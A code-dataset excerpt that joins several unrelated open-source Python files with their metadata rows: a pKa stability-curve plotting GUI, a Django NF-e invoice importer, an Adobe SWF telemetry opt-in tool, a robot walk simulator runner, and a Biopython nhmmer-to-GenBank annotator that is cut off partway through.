if stab_status=='on':
self.stability=self.do_stab_curve(X)
#
# Should we display loaded titration curves?
#
#try:
# print 'titration_data', self.titration_data
#except:
# print 'no titration_data'
if self.display_loaded_curves.get()==1:
if not getattr(self,'titration_data',None):
import tkMessageBox
tkMessageBox.showwarning('No titration curves loaded',
'Load titration curves first')
self.display_loaded_curves.set(0)
else:
for group in self.titration_data.keys():
phvals=self.titration_data[group].keys()
phvals.sort()
for ph in phvals:
crg=self.titration_data[group][ph]
x,y=self.get_xy(ph,crg)
try:
f = colour_map[group]
except:
f = 'yellow'
handle=self.tc.create_oval(x-2,y-2,x+2,y+2,fill=f)
self.lines[handle]=1
#
# Is there an FTIR model to update?
#
if self.show_ftir.get() == 1:
if getattr(self, 'FTIR_win',None):
self.FTIR_win.draw_fit()
else:
self.FTIR_win = ftir_data.FTIR_data(self)
self.FTIR_win.draw_fit()
#
# Other callbacks?
#
self.check_other_callbacks()
return X
#
# -------
#
def check_other_callbacks(self):
"""self.callbacks holds a list of funcions that should be called"""
if not hasattr(self,'callbacks'):
self.callbacks=[]
for callback in self.callbacks:
callback()
return
def add_callback(self,function):
"""Add a callback function"""
self.check_other_callbacks()
add=1
for callback in self.callbacks:
if function==callback:
add=None
break
if add:
self.callbacks.append(function)
self.check_other_callbacks()
return
#
# -------------
#
def do_stab_curve(self,X):
""" Calculate the stability curve"""
#
# Make sure that the acid/base info for the unfolded form is the same
# as for the folded form
#
for group in self.unfolded_groups.keys():
acid_base=self.groups[group].acid_base.get()
self.unfolded_groups[group].acid_base.set(acid_base)
#
# Calculate pKa values for the unfolded form
#
UF,ufpKa_values,UF_prot_states=self.calc_pKas_from_scales(self.unfolded_groups)
for group in ufpKa_values.keys():
self.unfolded_groups[self.ids[group]].pkavalue.set("%4.1f" %ufpKa_values[group])
#
# Get all the interaction energies
#
ufmatrix=self.setup_system(group_array=self.unfolded_groups,X=UF,energies=1)
matrix=self.setup_system(group_array=self.groups,X=X,energies=1)
#
# Integrate
#
integral=0.0
intcurve=[]
intcurve2=[]
dpH=abs(X.pHvalues[0]-X.pHvalues[1])
min_val=99999
max_val=-9999
#
# Specify constants
#
k=1.3806503E-23
T=298.15
Na=6.02214199E23
#factor=k*T*Na/1000.0
# No don't do it
factor=1
import math
ln10=math.log(10)
#
# Loop over all pH values
#
stability={}
for pH in X.pHvalues:
intcurve.append(integral)
stability[pH]=integral #Dictionary that will be passed back
#
# Update min and max
#
if integral<min_val:
min_val=integral
if integral>max_val:
max_val=integral
#
# Calculate total stability
#
for group in ufpKa_values.keys():
integral=integral+ln10*dpH*(X.prot_states[group][pH]-UF.prot_states[group][pH])*factor
#
# Calculate the electrostatic interaction
#
integral2=0
for group in matrix.keys():
for group2 in matrix.keys():
#
# Get the interaction between this group and the other group
#
g1_id=self.ids[group]
g2_id=self.ids[group2]
if self.groups[g1_id].active.get()==1 and self.groups[g2_id].active.get()==1 and group!=group2:
integral2=integral2+abs(X.prot_states[group][pH])*abs(X.prot_states[group2][pH])*matrix[group][group2]/2.0*factor
# Subtract the interaction in the unfolded state
integral2=integral2-abs(UF.prot_states[group][pH])*abs(UF.prot_states[group2][pH])*ufmatrix[group][group2]/2.0*factor
#
# Update min and max
#
if integral2<min_val:
min_val=integral2
if integral2>max_val:
max_val=integral2
intcurve2.append(integral2)
max_stabilisation=max_val
min_stabilisation=min_val
#
# Plot the whole thing
#
lastpH=X.pHvalues[0]
lastval=intcurve[0]
count=1
span=max_val-min_val
#
# Delete the lines from last time
#
for line in self.stab_lines.keys():
self.stab_tc.delete(line)
del self.stab_lines[line]
#
# Draw the y axis
#
canvas=self.stab_tc
x_axis=self.get_x(X.pHvalues[0])-20
y_axis=get_y_fromstab(min_val,span)
endy=get_y_fromstab(max_val,span)
self.stab_lines[canvas.create_line(x_axis,max([160,y_axis]),
x_axis,endy-10,fill='black',
width=self.linewidth)]=1
self.stab_lines[canvas.create_text(x_axis+10,endy-35,text='delta G of folding (kT)',fill='black',anchor='w')]=1
#
# Tick marks and tick labels
#
for tickval in range(int(min_val*100),int(max_val*100),int(max([(span*100.0)/5.0,1.0]))):
y=get_y_fromstab(tickval/100.0,span)
self.stab_lines[canvas.create_line(x_axis,
y,x_axis-5,y,
fill='black',width=self.linewidth)]=1
self.stab_lines[canvas.create_text(x_axis-25,y,text='%5.2f' %(
float(tickval)/100.0),fill='black')]=1
#
# Draw the stability lines
#
count=1
summed_contributions={}
label_position={}
for pH in X.pHvalues[1:]:
lastx=self.get_x(lastpH)
lasty=get_y_fromstab(lastval,span)
val=intcurve[count]
x=self.get_x(pH)
y=get_y_fromstab(val,span)
self.stab_lines[self.stab_tc.create_line(lastx,lasty,float(x),float(y),
fill='black',
width=self.linewidth)]=1
#
# Outline the contribution of each group
#
if self.show_grp_contribs.get()==1:
colour_count=0
null_y=get_y_fromstab(0.0,span)
starty_positive=null_y
starty_negative=null_y
ufgroups=ufpKa_values.keys()
ufgroups.sort()
for group in ufgroups:
#
# Is this group active?
#
g1_id=self.ids[group]
if self.groups[g1_id].active.get()==1:
#
# Make sure the dictionary is initialised
#
if not summed_contributions.has_key(group):
summed_contributions[group]=0.0
label_position[group]=None
#
# Get this contribution
#
dx=abs(lastx-x)
if self.contrib_type.get()==1:
#
# Here we get the stability contribution from pKa shifts
#
endy=get_y_fromstab(dpH*ln10*(X.prot_states[group][pH]-UF.prot_states[group][pH])*factor,span)-null_y
summed_contributions[group]=summed_contributions[group]+endy
else:
#
# Otherwise the stability contribution from charge-charge interactions
#
stab=0.0
for group2 in matrix.keys():
#
# Get the interaction between this group and the other group
#
g2_id=self.ids[group2]
if self.groups[g1_id].active.get()==1 and self.groups[g2_id].active.get()==1 and group!=group2:
stab=stab+abs(X.prot_states[group][pH])*abs(X.prot_states[group2][pH])*matrix[group][group2]/2.0*factor
# Subtract the interaction in the unfolded state
stab=stab-abs(UF.prot_states[group][pH])*abs(UF.prot_states[group2][pH])*ufmatrix[group][group2]/2.0*factor
endy=get_y_fromstab(stab,span)-null_y
summed_contributions[group]=endy
#
# Draw the box
#
endy=summed_contributions[group]
if endy>0:
self.stab_lines[self.stab_tc.create_rectangle(x+1.5*dx,starty_positive,lastx+1.5*dx,endy+starty_positive,
fill=self.colour_order[colour_count],
outline=self.colour_order[colour_count],
stipple='gray50',
width=self.linewidth)]=1
label_position[group]=(starty_positive*2+endy)/2.0
starty_positive=endy+starty_positive
else:
self.stab_lines[self.stab_tc.create_rectangle(x+1.5*dx,starty_negative,lastx+1.5*dx,endy+starty_negative,
fill=self.colour_order[colour_count],
outline=self.colour_order[colour_count],
stipple='gray50',
width=self.linewidth)]=1
label_position[group]=(starty_negative*2+endy)/2.0
starty_negative=endy+starty_negative
colour_count=colour_count+1
if colour_count==len(self.colour_order):
colour_count=0
#
# Continue
#
lastval=val
lastpH=pH
count=count+1
#
# Put labels on the contributions
#
if self.show_grp_contribs.get()==1:
colour_count=0
for group in ufgroups:
#
# Is this group active?
#
g1_id=self.ids[group]
if self.groups[g1_id].active.get()==1:
x=self.get_x(X.pHvalues[-1])
y=label_position[group]
colour=self.colour_order[colour_count]
self.stab_lines[canvas.create_text(x+50,y,text=group,
fill=colour,
anchor='w')]=1
#
# Update colours
#
colour_count=colour_count+1
if colour_count==len(self.colour_order):
colour_count=0
#
# Put in labels for min and max stabilisation
#
if self.show_min_max_stab.get()==1:
obj1=canvas.create_text(850,150,text='MAX destab: %5.2f kT' %max_stabilisation,fill='red',anchor='w')
obj2=canvas.create_text(850,180,text='MAX stab: %5.2f kT' %min_stabilisation,fill='blue',anchor='w')
self.stab_lines[obj1]=1
self.stab_lines[obj2]=1
#
# Do we have an experimental stability curve?
#
if self.exp_stab_curve:
for pH,ddG in self.exp_stab_curve:
x=self.get_x(pH)
y=get_y_fromstab(ddG,span)
self.stab_lines[canvas.create_oval(x-5,y-5,x+5,y+5)]=1
return stability
#
# ---------------
#
def start_geom(self):
"""Start geom opt"""
import pKa_calc
X=pKa_calc.Boltzmann()
distance_matrix=self.setup_system(self.groups,X)
import dist_geom
GM=dist_geom.distance_optimisation(distance_matrix,self.titration_curves)
return
#
# ----
#
def do_geom(self):
#
# Do geometry optimisation
#
# Update distances
#
import pKa_calc
X=pKa_calc.Boltzmann()
distance_matrix=self.setup_system(self.groups,X)
self.MD.set_eqdists(distance_matrix)
#diff=self.MD.EM(1)
#
# Delete old ovals
#
for oval in self.oval.keys():
self.geom_tc.delete(oval)
del self.oval[oval]
#
# Plot positions
#
group_count=0
groups=self.MD.atoms.keys()
groups.sort()
for grp in groups:
pos=self.MD.atoms[grp]['pos']
x=pos[0]
y=pos[1]
z=pos[2]
self.oval[self.geom_tc.create_oval(x-5,y-5,x+5,y+5,fill=self.colour_order[group_count])]=1
group_count=group_count+1
self.oval[self.geom_tc.create_text(10,10,anchor='nw',text='Sum of unsatisfied dists: %5.3f' %(diff))]=1
self.geom_window.after(100,self.start_geom)
return
#
# ----------------
#
def copy_to_Ekin(self):
"""Copy a titration curve or a population curve to the Ekin facility of EAT_DB"""
try:
import os,sys
import PEATDB.Ekin
except:
import tkMessageBox
tkMessageBox.showwarning('Cannot find PEAT',
'Cannot find PEAT_DB\nMake sure that you download PEAT from\nhttp://enzyme.ucd.ie/PEAT')
return
#
# Pick a group
#
self.pick_group=Toplevel()
self.pick_group.title('Pick a group')
self.pick_group.geometry('+200+200')
self.group_picked=IntVar()
count=0
groups=self.groups.keys()
groups.sort()
for group in groups:
Radiobutton(self.pick_group,text='%d:%s' %(group,self.groups[group].name.get()),
variable=self.group_picked,
value=count).grid(row=count,column=0)
count=count+1
self.group_picked.set(groups[0])
Button(self.pick_group,text='Copy group',command=self.copy_group).grid(row=count,column=0)
Button(self.pick_group,text='Cancel',command=self.cancel_copy_group).grid(row=count,column=1)
return
#
# ----
#
def copy_group(self,event=None):
"""Get the titration curve and send it to Ekin"""
group=None
for id in self.ids.keys():
if self.ids[id]==self.group_picked.get():
group=id
break
if not group:
raise 'Something very odd happended in copy_group'
#
# Get the data and reformat it
#
data=self.titration_curves[group].copy()
del data['pKa']
new_data={}
new_data[0]={}
new_data[1]={}
count=0
pHs=self.titration_curves[group].keys()
pHs.sort()
for pH in pHs:
new_data[0][count]=pH
new_data[1][count]=self.titration_curves[group][pH]
count=count+1
#
# Open Ekin, and load the data
#
import os,sys
import EAT_DB.Ekin
EK=EAT_DB.Ekin.Ekin(parent=self)
EK.pass_data(new_data)
#
# Destroy the little window
#
self.pick_group.destroy()
return
#
# ----
#
def cancel_copy_group(self,event=None):
"""Cancel copy group to Ekin"""
self.pick_group.destroy()
return
#
# -----------------
#
if __name__=='__main__':
import sys
if len(sys.argv)==2:
numgroups=int(sys.argv[1])
pKa_system(numgroups).mainloop()
else:
pKa_system().mainloop()
|
mit
| 2,878,138,869,651,541,500
| 35.954967
| 667
| 0.510268
| false
| 3.820223
| false
| false
| false
|
dudanogueira/microerp
|
microerp/producao/management/commands/nfe.py
|
1
|
6041
|
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand
from django.contrib.sites.models import Site
from cadastro.models import Cidade, Bairro
from rh.models import Funcionario, PeriodoTrabalhado, Cargo, Departamento
from account.models import User
from optparse import make_option
import os, csv, datetime
from django.utils.encoding import smart_unicode, smart_str
from xml.dom import minidom
from producao.models import FabricanteFornecedor
from producao.models import NotaFiscal
class Command(BaseCommand):
help = '''
Importa Nota Fiscal
'''
args = "--file notafiscal.xml,"
option_list = BaseCommand.option_list + (
make_option('--file',
action='store_true',
dest='arquivo',
help='Importa uma nota fiscal',
),
)
def handle(self, *args, **options):
arquivo = options.get('arquivo')
if options['arquivo']:
f = args[0]
try:
xmldoc = minidom.parse(f)
infNFE = xmldoc.getElementsByTagName('chNFe')[0]
idnfe = infNFE.firstChild.nodeValue[22:34]
nome_emissor = xmldoc.getElementsByTagName('xNome')[0]
nome = nome_emissor.firstChild.nodeValue
print "NOME DO EMISSOR: %s" % nome
print "ID NOTA FISCAL %s" % idnfe
emissor = xmldoc.getElementsByTagName('emit')[0]
cnpj_emissor = xmldoc.getElementsByTagName('CNPJ')[0].firstChild.nodeValue
# busca emissor
fornecedor,created = FabricanteFornecedor.objects.get_or_create(cnpj=cnpj_emissor)
fornecedor.nome = nome
fornecedor.save()
if created:
print "Fornecedor CRIADO: %s" % fornecedor
else:
print "Fornecedor encrontrado: %s" % fornecedor
total = xmldoc.getElementsByTagName('total')[0]
frete = total.getElementsByTagName('vFrete')[0].firstChild.nodeValue
# criando NFE no sistema
nfe_sistema,created = NotaFiscal.objects.get_or_create(fabricante_fornecedor=fornecedor, numero=idnfe)
nfe_sistema.taxas_diversas = frete
nfe_sistema.save()
# pega itens da nota
itens = xmldoc.getElementsByTagName('det')
for item in itens:
# cada item da nota...
codigo_produto = item.getElementsByTagName('cProd')[0].firstChild.nodeValue
quantidade = item.getElementsByTagName('qCom')[0].firstChild.nodeValue
valor_unitario = item.getElementsByTagName('vUnCom')[0].firstChild.nodeValue
print u"ITEM: %s" % codigo_produto
print u"Quantidade: %s" % quantidade
print u"Valor Unitário: %s" % valor_unitario
# impostos
try:
aliquota_icms = float(item.getElementsByTagName('pICMS')[0].firstChild.nodeValue)
except:
aliquota_icms = 0
try:
aliquota_ipi = float(item.getElementsByTagName('pIPI')[0].firstChild.nodeValue)
except:
aliquota_ipi = 0
try:
aliquota_pis = float(item.getElementsByTagName('pPIS')[0].firstChild.nodeValue)
except:
aliquota_pis = 0
try:
aliquota_cofins = float(item.getElementsByTagName('pCOFINS')[0].firstChild.nodeValue)
except:
aliquota_cofins = 0
total_impostos = aliquota_ipi + aliquota_icms + aliquota_cofins + aliquota_cofins
total_impostos = aliquota_ipi
print "Valor %% ICMS: %s" % aliquota_icms
print "Valor %% IPI: %s" % aliquota_ipi
print "Valor %% COFNS: %s" % aliquota_cofins
print "Valor %% PIS: %s" % aliquota_pis
print "Incidência de %% impostos: %s" % total_impostos
# busca o lancamento, para evitar dois lancamentos iguais do mesmo partnumber
item_lancado,created = nfe_sistema.lancamentocomponente_set.get_or_create(part_number_fornecedor=codigo_produto)
# atualiza
item_lancado.quantidade= quantidade
item_lancado.valor_unitario= valor_unitario
item_lancado.impostos= total_impostos
# salva
item_lancado.save()
# busca na memoria automaticamente
item_lancado.busca_part_number_na_memoria()
# calcula total da nota
nfe_sistema.calcula_totais_nota()
# printa tudo
print "#"*10
print "NOTA %s importada" % nfe_sistema.numero
frete = nfe_sistema.taxas_diversas
produtos = nfe_sistema.total_com_imposto
print "TOTAL DA NOTA: %s (Frete) + %s (Produtos + Impostos)" % (frete, produtos)
print "Produtos"
for lancamento in nfe_sistema.lancamentocomponente_set.all():
print u"----- PN-FORNECEDOR: %s, QTD: %s VALOR: %s, Impostos: %s%% = TOTAL: %s Unitário (considerando frete proporcional) %s" % (lancamento.part_number_fornecedor, lancamento.quantidade, lancamento.valor_unitario, lancamento.impostos, lancamento.valor_total_com_imposto, lancamento.valor_unitario_final)
except FabricanteFornecedor.DoesNotExist:
print u"Erro. Não encontrado Fornecedor com este CNPJ"
except:
raise
else:
print self.help
print self.args
|
lgpl-3.0
| 3,257,614,420,050,963,000
| 45.438462
| 323
| 0.549114
| false
| 3.770768
| false
| false
| false
|
shinho/SC2
|
bin/add-opt-in.py
|
1
|
7666
|
#!/usr/bin/env python
# Copyright (c) 2012, Adobe Systems Incorporated
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Adobe Systems Incorporated nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''See readme or run with no args for usage'''
import os
import sys
import tempfile
import shutil
import struct
import zlib
import hashlib
import inspect
supportsLZMA = False
try:
import pylzma
supportsLZMA = True
except:
pass
####################################
# Helpers
####################################
class stringFile(object):
def __init__(self, data):
self.data = data
def read(self, num=-1):
result = self.data[:num]
self.data = self.data[num:]
return result
def close(self):
self.data = None
def flush(self):
pass
def consumeSwfTag(f):
tagBytes = ""
recordHeaderRaw = f.read(2)
tagBytes += recordHeaderRaw
if recordHeaderRaw == "":
raise Exception("Bad SWF: Unexpected end of file")
recordHeader = struct.unpack("BB", recordHeaderRaw)
tagCode = ((recordHeader[1] & 0xff) << 8) | (recordHeader[0] & 0xff)
tagType = (tagCode >> 6)
tagLength = tagCode & 0x3f
if tagLength == 0x3f:
ll = f.read(4)
longlength = struct.unpack("BBBB", ll)
tagLength = ((longlength[3]&0xff) << 24) | ((longlength[2]&0xff) << 16) | ((longlength[1]&0xff) << 8) | (longlength[0]&0xff)
tagBytes += ll
tagBytes += f.read(tagLength)
return (tagType, tagBytes)
def outputInt(o, i):
o.write(struct.pack('I', i))
def outputTelemetryTag(o, passwordClear):
lengthBytes = 2 # reserve
if passwordClear:
sha = hashlib.sha256()
sha.update(passwordClear)
passwordDigest = sha.digest()
lengthBytes += len(passwordDigest)
# Record header
code = 93
if lengthBytes >= 63:
o.write(struct.pack('<HI', code << 6 | 0x3f, lengthBytes))
else:
o.write(struct.pack('<H', code << 6 | lengthBytes))
# Reserve
o.write(struct.pack('<H', 0))
# Password
if passwordClear:
o.write(passwordDigest)
####################################
# main()
####################################
if __name__ == "__main__":
####################################
# Parse command line
####################################
if len(sys.argv) < 2:
print("Usage: %s SWF_FILE [PASSWORD]" % os.path.basename(inspect.getfile(inspect.currentframe())))
print("\nIf PASSWORD is provided, then a password will be required to view advanced telemetry in Adobe 'Monocle'.")
sys.exit(-1)
infile = sys.argv[1]
passwordClear = sys.argv[2] if len(sys.argv) >= 3 else None
####################################
# Process SWF header
####################################
swfFH = open(infile, 'rb')
signature = swfFH.read(3)
swfVersion = swfFH.read(1)
struct.unpack("<I", swfFH.read(4))[0] # uncompressed length of file
if signature == "FWS":
pass
elif signature == "CWS":
decompressedFH = stringFile(zlib.decompressobj().decompress(swfFH.read()))
swfFH.close()
swfFH = decompressedFH
elif signature == "ZWS":
if not supportsLZMA:
raise Exception("You need the PyLZMA package to use this script on \
LZMA-compressed SWFs. http://www.joachim-bauch.de/projects/pylzma/")
swfFH.read(4) # compressed length
decompressedFH = stringFile(pylzma.decompress(swfFH.read()))
swfFH.close()
swfFH = decompressedFH
else:
raise Exception("Bad SWF: Unrecognized signature: %s" % signature)
f = swfFH
o = tempfile.TemporaryFile()
o.write(signature)
o.write(swfVersion)
outputInt(o, 0) # FileLength - we'll fix this up later
# FrameSize - this is nasty to read because its size can vary
rs = f.read(1)
r = struct.unpack("B", rs)
rbits = (r[0] & 0xff) >> 3
rrbytes = (7 + (rbits*4) - 3) / 8;
o.write(rs)
o.write(f.read((int)(rrbytes)))
o.write(f.read(4)) # FrameRate and FrameCount
####################################
# Process each SWF tag
####################################
while True:
(tagType, tagBytes) = consumeSwfTag(f)
if tagType == 93:
raise Exception("Bad SWF: already has EnableTelemetry tag")
elif tagType == 92:
raise Exception("Bad SWF: Signed SWFs are not supported")
elif tagType == 69:
# FileAttributes tag
o.write(tagBytes)
# Look ahead for Metadata tag. If present, put our tag after it
(nextTagType, nextTagBytes) = consumeSwfTag(f)
writeAfterNextTag = nextTagType == 77
if writeAfterNextTag:
o.write(nextTagBytes)
outputTelemetryTag(o, passwordClear)
# If there was no Metadata tag, we still need to write that tag out
if not writeAfterNextTag:
o.write(nextTagBytes)
(tagType, tagBytes) = consumeSwfTag(f)
o.write(tagBytes)
if tagType == 0:
break
####################################
# Finish up
####################################
# Fix the FileLength header
uncompressedLength = o.tell()
o.seek(4)
o.write(struct.pack("I", uncompressedLength))
o.flush()
o.seek(0)
# Copy the temp file to the outFile, compressing if necessary
outFile = open(infile, "wb")
if signature == "FWS":
shutil.copyfileobj(o, outFile)
else:
outFile.write(o.read(8)) # File is compressed after header
if signature == "CWS":
outFile.write(zlib.compress(o.read()))
elif signature == "ZWS":
compressed = pylzma.compress(o.read())
outputInt(outFile, len(compressed)-5) # LZMA SWF has CompressedLength header field
outFile.write(compressed)
else:
assert(false)
outFile.close()
if passwordClear:
print("Added opt-in flag with encrypted password " + passwordClear)
else:
print("Added opt-in flag with no password")
|
gpl-3.0
| 1,561,226,999,871,632,100
| 30.941667
| 132
| 0.594834
| false
| 3.949511
| false
| false
| false
|
aguirrea/lucy
|
tests/testBalieroWalk.py
|
1
|
2371
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Andrés Aguirre Dorelo
# MINA/INCO/UDELAR
#
# Execution of individuals resulted from the Baliero and Pias work
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import glob
import os
import sys
import time
from configuration.LoadSystemConfiguration import LoadSystemConfiguration
from datatypes.DTIndividualGeneticMaterial import DTIndividualGeneticTimeSerieFile, DTIndividualGeneticMatrix
from datatypes.DTIndividualProperty import DTIndividualPropertyBaliero, DTIndividualPropertyPhysicalBioloid
from Individual import Individual
balieroProp = DTIndividualPropertyBaliero()
physicalProp = DTIndividualPropertyPhysicalBioloid()
conf = LoadSystemConfiguration()
BalieroDir = os.getcwd()+conf.getDirectory("Baliero transformed walk Files")
arguments = len(sys.argv)
def createIndividual(filename):
if int(conf.getProperty("Lucy simulated?"))==1:
walk = Individual(balieroProp, DTIndividualGeneticTimeSerieFile(os.getcwd()+"/"+filename))
else:
walk = Individual(physicalProp, DTIndividualGeneticTimeSerieFile(os.getcwd()+"/"+filename))
return walk
walk = Individual(balieroProp, DTIndividualGeneticMatrix()) #dummy individual to initialise the simulator and enable the time step configuration
walk.execute()
print "please set the proper time step in vrep"
time.sleep(5)
if arguments > 1:
files = sys.argv[1:]
for filename in files:
print 'executing individual: ' + filename
walk = createIndividual(filename)
walk.execute()
else:
for filename in glob.glob(os.path.join(BalieroDir, '*.xml')):
print 'executing individual: ' + filename
walk = createIndividual(filename)
walk.execute()
|
gpl-3.0
| 1,704,087,821,725,901,800
| 36.03125
| 144
| 0.745992
| false
| 3.910891
| false
| false
| false
|
nikolaichik/SigmoID
|
Python/RepeatGen.py
|
1
|
23652
|
import sys
import argparse
from time import process_time
import Bio
from Bio.SeqFeature import FeatureLocation
from Bio.SeqFeature import SeqFeature
from decimal import *
class MySeqFeature(SeqFeature):
def __str__(self):
out = "type: %s\n" % self.type
if self.strand == 1:
out += "location: [%s:%s](%s)\n" % (self.location.start+1,
self.location.end, '+')
if self.strand == -1:
out += "location: [%s:%s](%s)\n" % (self.location.start+1,
self.location.end, '-')
if self.id and self.id != "<unknown id>":
out += "id: %s\n" % self.id
out += "qualifiers:\n"
for qual_key in sorted(self.qualifiers):
out += " Key: %s, Value: %s\n" % (qual_key,
self.qualifiers[qual_key])
if Bio.__version__ != '1.68': # to avoid problems with diff biopython versions
if not hasattr(self, "_sub_features"):
self._sub_features = []
if len(self._sub_features) != 0:
out += "Sub-Features\n"
for sub_feature in self._sub_features:
out += "%s\n" % sub_feature
return out
def is_within_feature(list_of_features, index, some_hit):
# 'index' is for feature's index within 'list_of_features'
if (list_of_features[index].location.start <
some_hit.location.start <
list_of_features[index].location.end or
list_of_features[index].location.start <
some_hit.location.end <
list_of_features[index].location.end) or \
(list_of_features[index].location.start <
some_hit.location.start <
some_hit.location.end <
list_of_features[index+1].location.start and \
list_of_features[index].strand == +1 and \
list_of_features[index].strand !=
list_of_features[index+1].strand):
# checking if hit is within other features or is between two convergent ones.
return True
else:
return False
def is_within_boundary(list_of_features, index, some_hit):
for feature in list_of_features[index:]:
if (feature.location.start - list_of_features[index].location.end) < (enter.boundary+1):
if (list_of_features[index].location.start+enter.boundary > \
some_hit.location.end > \
list_of_features[index].location.start and \
list_of_features[index].strand == +1) or \
(list_of_features[index].location.end-enter.boundary < \
some_hit.location.start < \
list_of_features[index].location.end and \
list_of_features[index].strand == -1):
return True
else:
return False
else:
return False
def qualifiers_function(qualifiers, var):
qual_var = []
for some_qualifier in qualifiers:
if any(symbol == '#' for symbol in some_qualifier):
qual_var.append(some_qualifier.split('#'))
else:
sys.exit('Please check your general qualifiers typing')
for number in range(len(qual_var)):
value_list = []
for index in range(len(qual_var)):
if qual_var[number][0] == qual_var[index][0] and \
qual_var[index][1] not in value_list:
value_list.append(qual_var[index][1])
var[qual_var[number][0]] = value_list
return var
def nhmm_parser(path_to_file, max_model_length):
x = []
try:
a = open(path_to_file, 'r')
except IOError:
sys.exit('Open error! Please check your nhmmer report input file!')
r = a.readlines()
b = []
d = []
e = []
for index in range(len(r)):
d.append([])
if not r[index].startswith('#') or r[index].startswith('\n'):
item = r[index].split(' ')
if len(item) >= 2:
for part in item:
if part != '' and len(part) != 0:
part = part.replace('\n', '')
d[index].append(part)
for index in range(len(d)):
if len(d[index]) != 0:
b.append(d[index])
for index in range(len(b)):
if len(b[index]) <= 10:
for number in range(len(b[index])):
b[index+1].insert(number, b[index][number])
for index in range(len(b)):
if len(b[index]) > 10:
e.append(b[index])
for item in e:
for num_of_spaces in range(len(e[0])):
# to avoid problems with additional spaces... e[0] - firstly \
# splitted string by ' '
try:
x.append([item[8+num_of_spaces],
item[9+num_of_spaces],
int(item[11+num_of_spaces]+'1'),
float(item[12+num_of_spaces]),
float(item[13+num_of_spaces]),
item[0+num_of_spaces],
item[1+num_of_spaces],
int(item[4+num_of_spaces]),
int(item[5+num_of_spaces]),
int(item[6+num_of_spaces]),
int(item[7+num_of_spaces])
])
if max_model_length is False:
max_model_length = int(item[5+num_of_spaces])
elif max_model_length is not False and \
int(item[5+num_of_spaces]) > max_model_length:
max_model_length = int(item[5+num_of_spaces])
else:
pass
except ValueError:
pass
else:
break
return [x, max_model_length]
def nhmm_prog(path_to_file, e):
a = open(path_to_file, 'r')
r = a.readlines()
prog_list = []
for prog_line in r:
if prog_line.startswith('# Program:') or \
prog_line.startswith('# Version:'):
prog_list.append(prog_line)
prog_list = [item.split(' ') for item in prog_list]
for item in prog_list:
for piece in item:
if piece != '':
e.append(piece)
return
def sorting_output_features(lst):
bit_score_list = []
for some_feature in lst:
for key in some_feature.qualifiers.keys():
if key == 'note':
temp = some_feature.qualifiers[key]
temp = temp.split(' ')
bit_score_list.append(float(temp[-3]))
return bit_score_list
def score_parser(some_feature):
for key in some_feature.qualifiers.keys():
if key == 'note' and type(some_feature.qualifiers['note']) != list:
temp = some_feature.qualifiers[key]
temp = temp.split(' ')
bit_score = float(temp[-3])
return bit_score
elif key == 'note' and type(some_feature.qualifiers['note']) == list:
for note in some_feature.qualifiers['note']:
if note.startswith('nhmmer'):
temp = note
temp = temp.split(' ')
bit_score = float(temp[-3])
return bit_score
def output(score_list, output_features):
for val in score_list:
for some_feature in output_features:
if val == feature_score(some_feature):
print (some_feature)
output_features = [f for f in output_features if f != some_feature]
def feature_score(some_feature):
for key in some_feature.qualifiers.keys():
if key == 'note' and type(some_feature.qualifiers[key]) != []:
temp = some_feature.qualifiers[key]
temp = temp.split(' ')
return float(temp[-3])
def dna_topology(path, topo_list):
# This function deals with with DNA topology problem in biopython
# for more detail: https://github.com/biopython/biopython/issues/363
infile = open(path, 'r')
loci_counter = -1 # because 1 is 0 in python
lines = infile.readlines()
for numline in range(len(lines)):
if lines[numline].startswith('LOCUS'):
loci_counter += 1
lines[numline] = topo_list[loci_counter]
infile.close()
return lines
def createparser():
parser = argparse.ArgumentParser(
prog='RepeatGen',
usage='\n%(prog)s <report_file> <input_file> <output_file> [options]',
description='''This script allows to add features to a genbank \
file according to nhmmer results.\
Requires Biopython 1.64 (or newer)''',
epilog='(c) Aliaksandr Damienikan, 2018.')
parser.add_argument('report_file',
help='path to nhmmer report file produced with \
-tblout option.')
parser.add_argument('input_file',
help='path to input Genbank file.')
parser.add_argument('output_file', help='path to output Genbank file.')
parser.add_argument('-L', '--length',
default=False,
help='annotate features of specified length (range of lengths).',
metavar='<int>/<int:int>',
required=False,
type=str)
parser.add_argument('-q', '--qual',
default='',
metavar='<key#"value">',
nargs='*',
dest='qual',
help='''add this qualifier to each annotated \
feature.''')
parser.add_argument('-p', '--palindromic',
action='store_const',
const=True,
default=False,
help='''filter palindromic repeats.''')
parser.add_argument('-E', '--eval',
default=False,
type=float,
metavar='<float or integer>',
help='''threshold E-Value.''')
parser.add_argument('-S', '--score',
default=False,
type=float,
